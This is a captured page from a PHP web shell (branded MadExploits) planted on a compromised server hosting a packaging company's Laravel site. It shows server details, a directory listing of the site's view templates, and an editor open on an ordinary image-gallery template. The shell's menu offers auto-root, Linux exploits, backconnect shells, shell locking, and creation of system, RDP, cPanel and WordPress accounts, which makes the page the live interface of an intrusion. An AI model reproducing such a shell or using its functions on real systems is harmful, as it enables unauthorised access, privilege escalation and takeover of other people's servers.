Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.97
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpackaging.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
1.05
KB
-rw-r--r--
beat_my_quote.blade.php
11.62
KB
-rw-r--r--
blogs.blade.php
3.25
KB
-rw-r--r--
category_products.blade.php
36.88
KB
-rw-r--r--
contact_us.blade.php
10.13
KB
-rw-r--r--
custom_printed_boxes.blade.php
57.52
KB
-rw-r--r--
dashboard.blade.php
4.07
KB
-rw-r--r--
em.blade.php
4.76
KB
-rw-r--r--
faqs.blade.php
828
B
-rw-r--r--
imagesitemap.blade.php
1.89
KB
-rw-r--r--
index.blade.php
50.29
KB
-rw-r--r--
index_old.blade.php
43.6
KB
-rw-r--r--
latest_offers.blade.php
58.09
KB
-rw-r--r--
personalized_packaging_boxes.b...
6.41
KB
-rw-r--r--
portfolio.blade.php
1.99
KB
-rw-r--r--
post.blade.php
3.01
KB
-rw-r--r--
privacy_security.blade.php
1.05
KB
-rw-r--r--
product_detail.blade.php
45.81
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
3.12
KB
-rw-r--r--
sitemap.blade.php
6.52
KB
-rw-r--r--
sitemapxml.blade.php
2.49
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
1006
B
-rw-r--r--
test.blade.php
41.6
KB
-rw-r--r--
thank_you.blade.php
1.61
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : personalized_packaging_boxes.blade.php
@extends('layouts.app') @push('styles') @endpush @section('contents') <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['msclkid'])){ $MSCLKID=$_GET['msclkid']; }else{ $MSCLKID=''; } ?> <?php $files = \Illuminate\Support\Facades\File::files(public_path('assets/images/personalized_boxes')); $images = []; foreach ($files as $file) { $images[] = $file->getRelativePathname(); } ?> <div class="portfolio"> <div class="container"> <div class="row py-5"> <div class="col-12"> <h1>The House of Best Custom Printing & Proficient Packaging Solutions</h1> <p> Noah Packaging proudly owns the best experts of printing and packaging industry. Here is the collection of some of the boxes crafted right according to our valued customers’ requirements. Having an ability to customize packaging boxes in different sizes, shapes and styles, Noah Packaging fulfills the requirement of customers in lowest rate with flawless printed results. Not only we accept short and long run orders, we use 100% recyclable Cardboard, Kraft and Corrugated materials to give you unrivaled printing and packaging solutions. </p> </div> </div> <div class="row"> <div class="col-sm-12 col-12"> <div class="card-columns"> <div class="row"> @foreach($images as $k=>$path) @if($k>8) <div class="col-md-3 col-sm-6 col-xs-12 mb-4"> <div class="product-block text-center padding-none shadow-view" > <img class="bg-white" onclick="openModal();currentSlide(<?php echo $k+1; ?>)" width="306" height="325" style="width: 100%;height: auto; border: 1px solid #222; border-radius: 5px" src="<?php echo e(asset('assets/images/placeholder-generic_0.webp')); ?>" data-src="{{ asset('assets/images/personalized_boxes/'.$path) }}" alt="Personalized"> </div> </div> @else <div class="col-md-3 col-sm-6 col-xs-12 mb-4"> <div class="product-block text-center padding-none shadow-view"> <img class="bg-white" onclick="openModal();currentSlide(<?php echo $k+1; ?>)" src="{{ asset('assets/images/personalized_boxes/'.$path) }}" width="306" height="325" style="width: 100%;height: auto; border: 1px solid #222; border-radius: 5px" alt="Personalized"> </div> </div> @endif @endforeach </div> </div> </div> </div> </div> </div> <div id="myModal" class="modal"> <span class="close cursor" onclick="closeModal()">×</span> <div class="modal-content" id="modal-content"> <div id="slide_top"> @foreach($images as $i=>$path) <div class="mySlides"> <div class="numbertext"><?php echo $i+1 .'/'. count($images); ?> </div> <img class="hover-shadow selected_image" src="<?php echo e(asset('assets/images/placeholder-generic_0.webp')); ?>" data-img="{{ asset('assets/images/personalized_boxes/'.$path) }}" alt="selected_image"> </div> @endforeach </div> <a class="prev" onclick="plusSlides(-1)">❮</a> <a class="next" onclick="plusSlides(1)">❯</a> <div class="caption-container"> <p id="caption"></p> </div> <div class="row"> @foreach($images as $j=>$path) <div class="col-sm-6 col-md-3 col-xs-12 bg-dark"> <img class="demo" src="<?php echo e(asset('assets/images/placeholder-generic_0.webp')); ?>" data-img="{{ asset('assets/images/personalized_boxes/'.$path) }}" onclick="currentSlide(<?php echo $j+1; ?>)" alt="Personalized Image"> </div> @endforeach </div> </div> </div> @endsection @push('scripts') <script> var element = document.getElementById("slide_top"); function openModal() { document.getElementById("myModal").style.display = "block"; } function closeModal() { document.getElementById("myModal").style.display = "none"; } var slideIndex = 1; showSlides(slideIndex); function plusSlides(n) { showSlides(slideIndex += n); } function currentSlide(n) { showSlides(slideIndex = n); element.scrollIntoView({behavior: "smooth", block: "end", inline: "nearest"}); } function showSlides(n) { var i; var slides = document.getElementsByClassName("mySlides"); var dots = document.getElementsByClassName("demo"); var captionText = document.getElementById("caption"); if (n > slides.length) {slideIndex = 1} if (n < 1) {slideIndex = slides.length} for (i = 0; i < slides.length; i++) { slides[i].style.display = "none"; } for (i = 0; i < dots.length; i++) { dots[i].className = dots[i].className.replace(" active", ""); } slides[slideIndex-1].style.display = "block"; dots[slideIndex-1].className += " active"; captionText.innerHTML = dots[slideIndex-1].alt; } </script> @endpush
Close